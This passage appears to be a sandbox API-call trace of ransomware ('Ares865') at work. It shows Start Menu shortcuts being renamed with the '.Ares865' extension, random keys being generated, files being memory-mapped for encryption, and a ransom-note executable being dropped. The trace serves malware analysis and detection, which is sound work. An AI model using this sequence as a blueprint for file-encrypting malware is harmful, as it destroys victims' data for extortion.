MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC\\Desktop.ini" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\tablet pc\\desktop.ini"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC\\Desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\tablet pc\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0068.479] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC\\Desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\tablet pc\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0068.479] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=343) returned 1 [0068.480] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0068.480] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.480] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0068.481] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x120 [0068.481] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0x420000 [0068.481] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0068.482] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.482] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0068.484] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC\\ShapeCollector.lnk.Ares865") returned 87 [0068.484] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC\\ShapeCollector.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\tablet pc\\shapecollector.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC\\ShapeCollector.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\tablet pc\\shapecollector.lnk.ares865"), dwFlags=0x1) returned 1 [0068.485] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC\\ShapeCollector.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\tablet pc\\shapecollector.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0068.485] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1436) returned 1 [0068.485] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0068.486] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.486] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0068.486] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8a0, lpName=0x0) returned 0x120 [0068.488] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8a0) returned 0x420000 [0068.489] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0068.489] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.489] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0068.490] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC\\TabTip.lnk.Ares865") returned 79 [0068.490] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC\\TabTip.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\tablet pc\\tabtip.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC\\TabTip.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\tablet pc\\tabtip.lnk.ares865"), dwFlags=0x1) returned 1 [0068.491] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC\\TabTip.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\tablet pc\\tabtip.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0068.491] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1386) returned 1 [0068.491] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0068.492] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.492] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0068.492] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x870, lpName=0x0) returned 0x120 [0068.494] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x870) returned 0x420000 [0068.495] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0068.496] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.496] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0068.496] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC\\Windows Journal.lnk.Ares865") returned 88 [0068.496] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC\\Windows Journal.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\tablet pc\\windows journal.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC\\Windows Journal.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\tablet pc\\windows journal.lnk.ares865"), dwFlags=0x1) returned 1 [0068.498] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC\\Windows Journal.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\tablet pc\\windows journal.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0068.498] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1316) returned 1 [0068.498] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0068.499] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.499] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0068.499] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x120 [0068.501] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x420000 [0068.502] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0068.503] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.503] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0068.503] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools" [0068.503] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0068.503] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0068.504] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools") returned 63 [0068.504] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools" | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools" [0068.504] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0068.504] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0068.504] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0068.504] GetLastError () returned 0x0 [0068.505] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk.Ares865") returned 89 [0068.505] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\character map.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\character map.lnk.ares865"), dwFlags=0x1) returned 1 [0068.506] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\character map.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0068.506] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1248) returned 1 [0068.506] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0068.507] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.507] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.507] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x120 [0068.508] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x420000 [0068.509] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0068.510] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.510] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.510] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini.Ares865") returned 83 [0068.510] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\desktop.ini"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0068.511] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0068.511] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1338) returned 1 [0068.512] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0068.512] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.512] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.513] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x840, lpName=0x0) returned 0x120 [0068.513] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x840) returned 0x420000 [0068.513] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0068.514] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.514] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.516] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\dfrgui.lnk.Ares865") returned 82 [0068.516] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\dfrgui.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\dfrgui.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\dfrgui.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\dfrgui.lnk.ares865"), dwFlags=0x1) returned 1 [0068.517] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\dfrgui.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\dfrgui.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.517] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1290) returned 1 [0068.518] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0068.518] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.518] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.519] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x12c [0068.520] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x190000 [0068.521] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0068.521] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.521] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.522] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Disk Cleanup.lnk.Ares865") returned 88 [0068.522] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Disk Cleanup.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\disk cleanup.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Disk Cleanup.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\disk cleanup.lnk.ares865"), dwFlags=0x1) returned 1 [0068.523] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Disk Cleanup.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\disk cleanup.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.523] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1252) returned 1 [0068.524] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0068.524] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.524] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.524] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x12c [0068.526] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x190000 [0068.527] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0068.528] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.528] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.528] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Resource Monitor.lnk.Ares865") returned 92 [0068.528] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Resource Monitor.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\resource monitor.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Resource Monitor.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\resource monitor.lnk.ares865"), dwFlags=0x1) returned 1 [0068.529] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Resource Monitor.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\resource monitor.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.530] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1242) returned 1 [0068.530] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0068.530] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.531] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.531] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x12c [0068.532] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x190000 [0068.533] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0068.534] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.534] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.534] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\System Information.lnk.Ares865") returned 94 [0068.534] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\System Information.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\system information.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\System Information.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\system information.lnk.ares865"), dwFlags=0x1) returned 1 [0068.535] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\System Information.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\system information.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.536] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1250) returned 1 [0068.536] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0068.536] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.536] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.537] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x154 [0068.538] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x190000 [0068.541] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0068.542] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.542] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.542] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\System Restore.lnk.Ares865") returned 90 [0068.542] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\System Restore.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\system restore.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\System Restore.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\system restore.lnk.ares865"), dwFlags=0x1) returned 1 [0068.545] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\System Restore.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\system restore.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.545] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1246) returned 1 [0068.545] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0068.546] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.546] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.546] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x154 [0068.547] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x190000 [0068.550] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0068.550] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.550] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.551] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Task Scheduler.lnk.Ares865") returned 90 [0068.551] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Task Scheduler.lnk" (normalized: 